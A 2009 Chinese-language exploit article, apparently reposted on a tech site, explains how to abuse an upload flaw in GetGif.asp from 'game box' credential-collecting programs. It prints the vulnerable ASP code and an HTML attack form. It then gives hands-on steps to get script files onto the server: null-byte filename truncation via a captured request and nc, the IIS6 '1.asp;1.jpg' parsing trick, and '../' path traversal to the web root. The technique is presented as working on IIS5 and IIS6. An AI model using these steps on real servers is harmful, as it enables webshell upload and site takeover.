当前位置:七道奇文章资讯安全技术网络技术
日期:2009-10-14 13:16:00  来源:本站整理

漏洞操纵_最新的游戏箱子收信程序上传[网络技术]

赞助商链接



  本文“漏洞操纵_最新的游戏箱子收信程序上传[网络技术]”是由七道奇为您精心收集,来源于网络转载,文章版权归文章作者所有,本站不对其观点以及内容做任何评价,请读者自行判断,以下是其具体内容:

文章写得简便一点,但是大家应当能看得懂!
存在这个漏洞的箱子程序还是挺多的!皇马,吉利什么的仿佛都有!
首先看一下存在漏洞的具体文件代码,文件名称是GetGif.asp
CODE:
<!--#include file="config.asp"-->
<%
Response.Buffer = True
Server.ScriptTimeOut=180
'On Error Resume Next
'dim SavePath
ExtName = "jpg,gif,png" '答应扩大名
SavePath =imgFolder '保存途径
If Right(SavePath,1)<>"/" Then SavePath=SavePath&"/" '在目录后加(/)
CheckAndCreateFolder(SavePath)
UpLoadAll_a = Request.TotalBytes '获得客户端全部内容
If(UpLoadAll_a<=0) Then
Response.Write "Sorry" 
Response.End
end if
Set UploadStream_c = Server.CreateObject("ADODB.Stream")
UploadStream_c.Type = 1
UploadStream_c.Open
UploadStream_c.Write Request.BinaryRead(UpLoadAll_a)
UploadStream_c.Position = 0
FormDataAll_d = UploadStream_c.Read
CrLf_e = chrB(13)&chrB(10)
FormStart_f = InStrB(FormDataAll_d,CrLf_e)
FormEnd_g = InStrB(FormStart_f+1,FormDataAll_d,CrLf_e)
Set FormStream_h = Server.Createobject("ADODB.Stream")
FormStream_h.Type = 1
FormStream_h.Open
UploadStream_c.Position = FormStart_f + 1
UploadStream_c.CopyTo FormStream_h,FormEnd_g-FormStart_f-3
FormStream_h.Position = 0
FormStream_h.Type = 2
FormStream_h.CharSet = "GB2312"
FormStreamText_i = FormStream_h.Readtext
FormStream_h.Close
FileName_j = Mid(FormStreamText_i,InstrRev(FormStreamText_i,"\")+1,FormEnd_g)
'FileName_j = Mid(FormStreamText_i,InstrRev(FormStreamText_i,"=")+2,FormEnd_g)
'Response.Write FileName_j
If(CheckFileExt(FileName_j,ExtName)) Then
SaveFile = Server.MapPath(SavePath & FileName_j)
'SaveFile=SavePath & FileName_j
If Err Then
Response.Write "Sorry" 
Err.Clear
Response.End
Else
SaveFile = CheckFileExists(SaveFile)
k=Instrb(FormDataAll_d,CrLf_e&CrLf_e)+4
l=Instrb(k+1,FormDataAll_d,leftB(FormDataAll_d,FormStart_f-1))-k-2
FormStream_h.Type=1
FormStream_h.Open
UploadStream_c.Position=k-1
UploadStream_c.CopyTo FormStream_h,l
FormStream_h.SaveToFile SaveFile,2
SaveFileName = Mid(SaveFile,InstrRev(SaveFile,"\")+1)
Response.write "OK"
Response.End
End If
Else
Response.Write "Sorry" 
Response.End
End If
%>
<%
'判断文件范例能否合格
Function CheckFileExt(FileName,ExtName) '文件名,答应上传文件范例
FileType = ExtName
FileType = Split(FileType,",")
For i = 0 To Ubound(FileType)
If LCase(Right(FileName,3)) = LCase(FileType(i)) then
CheckFileExt = True
Exit Function
Else
CheckFileExt = False
End if
Next
End Function
'查抄上传文件夹能否存在,不存在则成立文件夹
Function CheckAndCreateFolder(FolderName)
fldr = Server.Mappath(FolderName)
Set fso = CreateObject("Scripting.FileSystemObject")
If Not fso.FolderExists(fldr) Then
fso.CreateFolder(fldr)
End If
Set fso = Nothing
End Function
'查抄文件能否存在,重命名存在文件
Function CheckFileExists(FileName)
Set fso=Server.CreateObject("Scripting.FileSystemObject")
If fso.FileExists(SaveFile) Then
i=1
msg=True
Do While msg
CheckFileExists = Replace(SaveFile,Right(SaveFile,4),"_" & i & Right(SaveFile,4))
If not fso.FileExists(CheckFileExists) Then
msg=False
End If
i=i+1
Loop
Else
CheckFileExists = FileName
End If
Set fso=Nothing
End Function
%>
也是很简便的一个上传代码,也存在上传漏洞,使我们想起了DVBBS的上传漏洞,自己着手写一个HTML提交页面
CODE:
<form action=http://www.xxx.com/getgif.asp method="post" enctype="multipart/form-data" name="form1">
<p>
<input name="file" type="file" size="50">
</p>
<p>
<input type="submit" name="Submit" value="提交">
</p>
</form>然后抓包,改包"20"-"00",NC上传便可以了~这步骤不懂得的朋友可以参考一下DVBBS的上传漏洞
以上办法通杀IIS5和IIS6,还有一种办法就是针对IIS6的解析漏洞,可以上传一个1.asp;1.jpg文件也是可以的!
此外还有一个就是针对途径的问题,因为默许的上传途径是/img/
但是很多箱子的主人都把这个途径改掉了,如改成/img001/,更有甚者将目录设置的更为复杂
针对这种情形的办理办法是在包中增添"../”,增添数目可以不是一个,假如箱子主人设置的很BT的话,可以通过提交多个"../”,
在发生提交叉误时,之前提交的文件就会被上传到网站的根目录了!具体情形还请大家具体解析一下!
 


  以上是“漏洞操纵_最新的游戏箱子收信程序上传[网络技术]”的内容,如果你对以上该文章内容感兴趣,你可以看看七道奇为您推荐以下文章:
  • 注入漏洞操纵 SHOPXP网上购物系统 v8.0
  • 漏洞操纵_最新的游戏箱子收信程序上传
  • 本文地址: 与您的QQ/BBS好友分享!
    • 好的评价 如果您觉得此文章好,就请您
        0%(0)
    • 差的评价 如果您觉得此文章差,就请您
        0%(0)

    文章评论评论内容只代表网友观点,与本站立场无关!

       评论摘要(共 0 条,得分 0 分,平均 0 分) 查看完整评论
    Copyright © 2020-2022 www.xiamiku.com. All Rights Reserved .